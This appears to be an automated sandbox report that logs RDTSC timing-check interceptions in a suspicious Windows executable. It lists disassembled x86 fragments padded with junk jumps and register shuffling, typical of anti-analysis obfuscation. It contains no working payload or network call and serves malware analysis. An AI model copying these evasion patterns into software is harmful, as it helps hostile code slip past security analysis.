Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C0011B second address: 4C001C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 799E8DE2h 0x00000008 jmp 00007FD1807ED553h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 mov bl, cl 0x00000015 pop edi 0x00000016 mov si, A953h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FD1807ED556h 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD1807ED54Eh 0x0000002a sub ah, 00000008h 0x0000002d jmp 00007FD1807ED54Bh 0x00000032 popfd 0x00000033 mov ebx, eax 0x00000035 popad 0x00000036 push dword ptr [ebp+04h] 0x00000039 jmp 00007FD1807ED552h 0x0000003e push dword ptr [ebp+0Ch] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FD1807ED54Dh 0x0000004a sub si, 47D6h 0x0000004f jmp 00007FD1807ED551h 0x00000054 popfd 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20C31 second address: 4C20C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD180B5C167h 0x00000009 xor ax, C1DEh 0x0000000e jmp 00007FD180B5C169h 0x00000013 popfd 0x00000014 jmp 00007FD180B5C160h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20C85 second address: 4C20CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20CA2 second address: 4C20CA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20CA7 second address: 4C20CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 22h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED552h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C2078A second address: 4C20843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD180B5C167h 0x00000011 adc ax, F5FEh 0x00000016 jmp 00007FD180B5C169h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FD180B5C160h 0x00000022 add si, 5CF8h 0x00000027 jmp 00007FD180B5C15Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FD180B5C164h 0x00000036 and ax, B758h 0x0000003b jmp 00007FD180B5C15Bh 0x00000040 popfd 0x00000041 mov ebx, esi 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD180B5C161h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C2070F second address: 4C20713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20713 second address: 4C20717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20717 second address: 4C2071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C2071D second address: 4C20723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20723 second address: 4C20727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20727 second address: 4C2073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 0747C2EBh 0x00000011 mov ax, A2C7h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C204A3 second address: 4C204A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C204A9 second address: 4C204AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C204AD second address: 4C204B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C204B1 second address: 4C204E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d mov si, CACFh 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FD180B5C162h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov ax, dx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C204E1 second address: 4C204F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2354h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 mov eax, 52669397h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C204F8 second address: 4C204FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C204FE second address: 4C20502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20502 second address: 4C20506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30227 second address: 4C30254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED54Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30254 second address: 4C302B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e mov edi, 29700ACEh 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FD180B5C165h 0x0000001a mov ebp, esp 0x0000001c jmp 00007FD180B5C15Eh 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD180B5C167h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C70021 second address: 4C7008E instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, FCh 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007FD1807ED54Ch 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 movzx esi, di 0x00000016 pushfd 0x00000017 jmp 00007FD1807ED553h 0x0000001c and al, 0000001Eh 0x0000001f jmp 00007FD1807ED559h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD1807ED558h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C7008E second address: 4C70092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C70092 second address: 4C70098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C70098 second address: 4C700C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 call 00007FD180B5C168h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, 60F9h 0x00000017 mov di, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40392 second address: 4C403E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov dh, DEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD1807ED558h 0x00000012 add esi, 5C138878h 0x00000018 jmp 00007FD1807ED54Bh 0x0000001d popfd 0x0000001e mov ecx, 709093AFh 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD1807ED550h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C403E2 second address: 4C40431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d call 00007FD180B5C160h 0x00000012 mov dl, al 0x00000014 pop edi 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FD180B5C15Ah 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD180B5C167h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40431 second address: 4C4046F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007FD1807ED54Bh 0x0000000c add ecx, 5E5BE85Eh 0x00000012 jmp 00007FD1807ED559h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and dword ptr [eax], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C4046F second address: 4C40473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40473 second address: 4C40479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40479 second address: 4C4047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C4047F second address: 4C40483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40483 second address: 4C40487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40487 second address: 4C404BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c jmp 00007FD1807ED558h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED54Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C404BA second address: 4C404BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C404BE second address: 4C404C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20608 second address: 4C2067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov bh, 37h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD180B5C15Dh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov cl, F1h 0x00000015 pushfd 0x00000016 jmp 00007FD180B5C169h 0x0000001b jmp 00007FD180B5C15Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FD180B5C166h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD180B5C167h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C2067E second address: 4C20684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20684 second address: 4C20688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C606C5 second address: 4C606C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C606C9 second address: 4C606CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C606CF second address: 4C606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C606D4 second address: 4C606FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD180B5C160h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD180B5C15Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C606FB second address: 4C6070A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C6070A second address: 4C60722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C60722 second address: 4C6075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 65D86F6Fh 0x00000011 pushfd 0x00000012 jmp 00007FD1807ED554h 0x00000017 sbb ecx, 555AAF98h 0x0000001d jmp 00007FD1807ED54Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C6075B second address: 4C60761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C60761 second address: 4C60765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C60765 second address: 4C60795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD180B5C166h 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C60795 second address: 4C60799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C60799 second address: 4C6079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C6079F second address: 4C607BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C607BE second address: 4C607C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C607C2 second address: 4C607C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C607C6 second address: 4C607CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C607CC second address: 4C6081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b jmp 00007FD1807ED554h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD1807ED550h 0x00000017 or ecx, 61135848h 0x0000001d jmp 00007FD1807ED54Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C6081B second address: 4C608A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [76FB65FCh] 0x0000000b pushad 0x0000000c call 00007FD180B5C162h 0x00000011 mov ch, 39h 0x00000013 pop edi 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C15Ch 0x0000001a or ecx, 16A3FDD8h 0x00000020 jmp 00007FD180B5C15Bh 0x00000025 popfd 0x00000026 popad 0x00000027 test eax, eax 0x00000029 jmp 00007FD180B5C166h 0x0000002e je 00007FD1F2E2F248h 0x00000034 jmp 00007FD180B5C160h 0x00000039 mov ecx, eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FD180B5C167h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C608A5 second address: 4C608CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C608CB second address: 4C608CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C608CF second address: 4C608D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C608D5 second address: 4C608FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d push esi 0x0000000e mov ecx, edx 0x00000010 pop edx 0x00000011 popad 0x00000012 ror eax, cl 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD180B5C15Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C608FE second address: 4C60902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C60902 second address: 4C60908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C60908 second address: 4C6094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED552h 0x00000008 call 00007FD1807ED552h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED553h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C6094B second address: 4C6094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C6094F second address: 4C60955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10034 second address: 4C10048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C160h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10148 second address: 4C10177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED558h 0x00000009 and cx, D088h 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10177 second address: 4C1020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FD180B5C15Fh 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD180B5C164h 0x00000015 add eax, 7E982618h 0x0000001b jmp 00007FD180B5C15Bh 0x00000020 popfd 0x00000021 push esi 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FD180B5C15Dh 0x00000032 adc cx, 87B6h 0x00000037 jmp 00007FD180B5C161h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FD180B5C160h 0x00000043 sbb ax, AAD8h 0x00000048 jmp 00007FD180B5C15Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C1020A second address: 4C10280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov di, F3C6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d jmp 00007FD1807ED54Ah 0x00000012 mov dword ptr [esp], edi 0x00000015 pushad 0x00000016 mov eax, 48F1454Dh 0x0000001b pushfd 0x0000001c jmp 00007FD1807ED54Ah 0x00000021 and ch, 00000068h 0x00000024 jmp 00007FD1807ED54Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test esi, esi 0x0000002d jmp 00007FD1807ED556h 0x00000032 je 00007FD1F2B0B8FEh 0x00000038 jmp 00007FD1807ED550h 0x0000003d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10280 second address: 4C1029D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C1029D second address: 4C102C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD1F2B0B8BFh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD1807ED54Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C102C5 second address: 4C102CF instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
